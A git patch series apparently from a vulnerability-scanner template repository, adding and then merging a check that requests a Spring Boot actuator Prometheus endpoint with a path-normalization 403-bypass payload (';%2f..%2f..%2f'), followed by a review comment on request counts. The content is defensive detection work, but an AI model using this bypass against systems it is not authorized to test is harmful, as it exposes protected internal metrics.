From ee2ce419223d973d61809fd1323f41d4cddde3d2 Mon Sep 17 00:00:00 2001
From: Naveen J
Date: Mon, 16 Oct 2023 07:39:05 +0530
Subject: [PATCH 1/2] Create springboot-prometheus.yaml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Bypass 403 restriction to Springboot prometheus endpoint.

### Reference
https://infosecwriteups.com/hunting-for-hidden-treasures-unveiling-the-403-bypass-bug-bounty-adventure-️-️-c6d17a0282ac
---
 .../springboot/springboot-prometheus.yaml | 39 +++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 http/misconfiguration/springboot/springboot-prometheus.yaml

diff --git a/http/misconfiguration/springboot/springboot-prometheus.yaml b/http/misconfiguration/springboot/springboot-prometheus.yaml
new file mode 100644
index 0000000000..d6b090d003
--- /dev/null
+++ b/http/misconfiguration/springboot/springboot-prometheus.yaml
@@ -0,0 +1,39 @@
+id: springboot-Information-Disclosure
+
+info:
+ name: Springboot prometheus - Detect
+ author: thevillagehacker
+ severity: low
+ description: Sensitive information disclosure
+ metadata:
+ max-request: 4
+ tags: misconfig,springboot,prometheus,exposure
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/actuator/prometheus;%2f..%2f..%2f"
+
+ stop-at-first-match: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "# HELP"
+ - "# TYPE"
+ - "HELP"
+ - "TYPE"
+ condition: or
+
+ - type: word
+ part: body
+ words:
+ - "jvm"
+ - "tomcat"
+ condition: or
+
+ - type: status
+ status:
+ - 200

From 6f394815add9f620c156aaccfe25f6c35cc957f7 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 17 Oct 2023 01:21:17 +0530
Subject: [PATCH 2/2] updated endpoint & co author

added the new endpoint in old template and added the author name
---
 .../prometheus/prometheus-log.yaml | 3 +-
 .../springboot/springboot-prometheus.yaml | 39 -------------------
 2 files changed, 2 insertions(+), 40 deletions(-)
 delete mode 100644 http/misconfiguration/springboot/springboot-prometheus.yaml

diff --git a/http/misconfiguration/prometheus/prometheus-log.yaml b/http/misconfiguration/prometheus/prometheus-log.yaml
index e05afa1a55..6af1c13cc0 100644
--- a/http/misconfiguration/prometheus/prometheus-log.yaml
+++ b/http/misconfiguration/prometheus/prometheus-log.yaml
@@ -2,7 +2,7 @@ id: prometheus-log
 
 info:
 name: Exposed Prometheus
- author: dhiyaneshDK
+ author: dhiyaneshDK,thevillagehacker
 severity: low
 metadata:
 max-request: 2
@@ -13,6 +13,7 @@ http:
 path:
 - "{{BaseURL}}/prometheus"
 - "{{BaseURL}}/actuator/prometheus"
+ - "{{BaseURL}}/actuator/prometheus;%2f..%2f..%2f"
 
 matchers-condition: and
 matchers:
diff --git a/http/misconfiguration/springboot/springboot-prometheus.yaml b/http/misconfiguration/springboot/springboot-prometheus.yaml
deleted file mode 100644
index d6b090d003..0000000000
--- a/http/misconfiguration/springboot/springboot-prometheus.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: springboot-Information-Disclosure
-
-info:
- name: Springboot prometheus - Detect
- author: thevillagehacker
- severity: low
- description: Sensitive information disclosure
- metadata:
- max-request: 4
- tags: misconfig,springboot,prometheus,exposure
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/actuator/prometheus;%2f..%2f..%2f"
-
- stop-at-first-match: true
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "# HELP"
- - "# TYPE"
- - "HELP"
- - "TYPE"
- condition: or
-
- - type: word
- part: body
- words:
- - "jvm"
- - "tomcat"
- condition: or
-
- - type: status
- status:
- - 200
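Review bot: The `max-request: 2` shown as context in the first hunk of prometheus-log.yaml is stale once the second hunk adds a third path; change it to `max-request: 3`, since that field records the maximum number of requests the template can issue and each entry under `path` is one request. The new `;%2f..%2f..%2f` path is a path-normalization variant with no explanation in the file, so a later maintainer cannot tell why it sits next to the plain path; a comment above it such as `# normalization variant: a hit here while the plain path is denied means the access rule is applied to the raw URL rather than the path the application resolves` would record that. Whether the existing matchers are strict enough for this variant (a traversal-looking request can draw a generic 200 page from some proxies, which would be a false positive) cannot be judged from here, because the `http` block and its matchers continue past the hunk.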